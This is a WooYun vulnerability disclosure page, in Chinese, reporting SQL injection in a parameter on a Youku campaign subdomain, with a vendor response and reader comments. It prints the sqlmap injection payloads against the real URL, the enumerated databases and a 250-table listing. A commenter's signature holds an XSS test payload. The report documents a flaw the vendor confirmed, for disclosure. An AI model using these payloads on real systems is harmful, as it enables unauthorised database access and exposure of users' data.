当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-083661

漏洞标题:优酷分站SQL注入

相关厂商:优酷

漏洞作者: U神

提交时间:2014-11-17 22:29

修复时间:2015-01-01 22:30

公开时间:2015-01-01 22:30

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2014-11-17: 细节已通知厂商并且等待厂商处理中
2014-11-18: 厂商已经确认,细节仅向厂商公开
2014-11-28: 细节向核心白帽子及相关领域专家公开
2014-12-08: 细节向普通白帽子公开
2014-12-18: 细节向实习白帽子公开
2015-01-01: 细节向公众公开

简要描述:

详细说明:

http://hvsop.youku.com/list.php?music=1


09.jpg


sqlmap identified the following injection points with a total of 0 HTTP(s) reque
sts:
---
Place: GET
Parameter: music
Type: boolean-based blind
Title: AND boolean-based blind - WHERE or HAVING clause
Payload: music=1' AND 7821=7821 AND 'IbzW'='IbzW
Type: UNION query
Title: MySQL UNION query (NULL) - 15 columns
Payload: music=1' UNION ALL SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,C
ONCAT(0x7178686571,0x496c4e6172726d6c4b7a,0x7166706a71),NULL,NULL,NULL,NULL,NULL
,NULL#
Type: AND/OR time-based blind
Title: MySQL > 5.0.11 AND time-based blind
Payload: music=1' AND SLEEP(5) AND 'fKmP'='fKmP
---
[22:00:42] [INFO] the back-end DBMS is MySQL
web application technology: Apache, PHP 5.3.10
back-end DBMS: MySQL 5.0.11
[22:00:42] [INFO] fetching database names
available databases [3]:
[*] db_events
[*] information_schema
[*] test
[22:00:42] [INFO] fetched data logged to text files under 'C:\Python27\sqlmap\ou
tput\hvsop.youku.com'

漏洞证明:

Database: db_events
[250 tables]
+--------------------------+
| 7up_user |
| adidas_2010_football |
| adidas_2011_tvc_info |
| adidas_comments |
| aveo_clicks |
| aveo_comments |
| aveo_users |
| background_users |
| bosideng_1024_users |
| bosideng_code |
| bosideng_fake_users |
| bosideng_photos |
| bosideng_users |
| bosideng_video_vote_logs |
| bosideng_videos |
| bosideng_vote_logs |
| bsd_kpi_email |
| bsd_kpi_user |
| bsd_rt_log |
| bsd_user |
| bugles_videos |
| casesharing_2013 |
| cgirl2014_awards |
| cgirl_images |
| cgirl_users |
| cgirl_videos |
| chengxin_news |
| chery_comments |
| chery_photo_vote_logs |
| chery_photos |
| chery_users |
| chery_video_vote_logs |
| chery_videos |
| cityshow_comment |
| cityshow_data |
| cityshow_member |
| clear_game_log |
| clear_log |
| clear_rt_log |
| clear_users |
| crowneplaza_register |
| cruze_images |
| cruze_users |
| cruze_videos |
| deyi_tickets_users |
| dove2014_erweima |
| dove2014_videos |
| dove_user |
| dove_video |
| dumex_videos |
| etam_comment |
| etam_txt |
| fiesta_2011_guestbook |
| fm_dream |
| fm_kpi_member |
| fm_number |
| fm_number_bak |
| fm_number_t |
| fm_number_test |
| fm_support_log |
| fm_user |
| fm_vote_log |
| fm_work |
| ford_users |
| global_accounts |
| global_china |
| global_files |
| global_minisites |
| global_testing |
| global_units |
| greetingcard_params |
| gucci_comments |
| gucci_rt_logs |
| gucci_users |
| hkdl_users |
| ht_config |
| ht_guest |
| ht_user |
| htc_config |
| hvsop2013_awards |
| hvsop2014_20 |
| hvsop2014_users |
| hvsop_comments |
| hvsop_live_email |
| hvsop_resumes |
| hvsop_users |
| hvsop_videos |
| hvsop_vote_logs |
| icedew_videos |
| jasmine_comments |
| jw2ask_marked |
| jw2ask_plans |
| jw2ask_questions |
| jw2ask_same_q |
| jw2ask_top30_grade_logs |
| kohler_comments |
| kohler_mm_awards |
| kohler_photo_vote_logs |
| kohler_photos |
| kohler_prize_logs |
| kohler_users |
| kohler_video_vote_logs |
| kohler_videos |
| lancome_datas |
| lancome_infos |
| lancome_users |
| lee_moment_photos |
| lee_moment_votelog |
| levis_data |
| levis_logs |
| levis_win |
| loreal_flash_ad |
| mabelline_users |
| mamonde_2013_videos |
| market_huanzhu_votes |
| marketing_apply_info |
| marketing_darenxiu |
| marketing_fashion |
| marketing_jianjiancao |
| marketing_kfc_avatar |
| marketing_kfc_cms |
| marketing_laifushi |
| marketing_upload_info |
| mmd_datas |
| mql_award |
| mql_seckill |
| mql_seckill_bak |
| mql_seckill_log |
| nfsq_users |
| nikegz_comments |
| nikegz_image |
| nikegz_pks |
| nikegz_videos |
| nivea_answer_logs |
| nivea_awards |
| nivea_final_awards |
| nivea_photos |
| nivea_question |
| nivea_users |
| nivea_vote_logs |
| onstar_regist |
| onstar_video |
| oreo_images |
| oreo_videos |
| pepsi_comments |
| pepsi_ecards |
| pepsi_media |
| pepsi_users |
| pepsi_videos |
| pepsi_vote_logs |
| pepsicny_videos |
| qingyang_comment |
| qingyang_videos |
| remyvsop_banner |
| remyvsop_comment |
| remyvsop_mobile |
| remyvsop_news |
| remyvsop_register |
| remyvsop_teams |
| remyvsop_videos |
| ricola_pincode |
| ricola_tickets |
| roewe_comment |
| roewe_config |
| roewe_guess |
| roewe_player |
| roewe_user |
| scj_users |
| sprite_users |
| sprite_videos |
| superb_comments |
| superb_comments_bak |
| superb_videos |
| sww_2011_users |
| sww_2011_videos |
| unit_cachedata |
| unit_comments |
| unit_misc |
| unit_news |
| unit_users |
| unit_videos |
| unit_visitors |
| unit_voting |
| vichy2013_awards |
| vichy2013_winners |
| vsop_email |
| vsop_live_mobile |
| vsop_loop_videos |
| vsop_lyp |
| vsop_users |
| vsop_videos |
| vsop_vote_email |
| wtcc_2011_guestbook |
| wtcc_2011_shots |
| wtcc_2011_users |
| wzmt_awards |
| wzmt_awards_bak |
| wzmt_seckill |
| wzmt_seckill_log |
| z_acer_user |
| z_bwnzb_user |
| z_eleven_user |
| z_fanta |
| z_fanta_email |
| z_ferrari |
| z_ferrero_user |
| z_huggies |
| z_huggies_comments |
| z_k3 |
| z_k3_user |
| z_k3_v |
| z_lenscrafter_pic |
| z_lenscrafter_user |
| z_loreal |
| z_market_disney |
| z_market_topchef |
| z_proya2011_100 |
| z_proya2011_code |
| z_proya2011_mblog |
| z_proya2011_pic |
| z_proya2011_user |
| z_proya2011_v2_pic |
| z_proya2011_v2_user |
| z_proya_pic |
| z_proya_user |
| z_remyclub_comment |
| z_remyclub_user |
| z_riich_user |
| z_sdeer_user |
| z_sepb_user |
| z_sgm15th |
| z_volvo |
| z_wp_code |
| z_young |
| z_z_comment |
| z_z_contact |
| z_z_contact2 |
| z_z_email |
| z_z_img |
| z_z_luck |
| z_z_module_luck |
| z_z_p |
| z_z_txt |
| z_z_txt_vote |
| z_z_v |
| z_z_vote |
| z_z_vote_id |
| z_z_vote_ip |
| zhijue_users |
| zqbb_videos |
+--------------------------+

修复方案:

我就跑到表,不深入了,修复吧,谢谢~好几天没rank了能来点不?

版权声明:转载请注明来源 U神@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2014-11-18 08:46

厂商回复:

多谢提醒,马上修复。

最新状态:

暂无


漏洞评价:

评论

  1. 2014-11-18 02:05 | ki11y0u ( 普通白帽子 | Rank:104 漏洞数:23 | 好好学习,求带飞~~~~~~~~~~~~~~~~~~~~~~...)

    前排~~~

  2. 2014-11-18 08:52 | backtrack丶yao ( 普通白帽子 | Rank:290 漏洞数:107 | "><img src=x onerror=alert(666666);> <im...)

    此号被社 by:U神

  3. 2014-11-19 09:56 | Aepl│恋爱 ( 实习白帽子 | Rank:45 漏洞数:15 | Forzen恋爱-不要做你的Guest 只想做的你adm...)

    你关注的白帽子 U神 发表了漏洞 宜信某重要分站命令执行(可内网渗透) 2014-11-18你关注的白帽子 U神 发表了漏洞 优酷分站SQL注入 2014-11-17你关注的白帽子 U神 发表了漏洞 东方航空分站命令执行 2014-11-17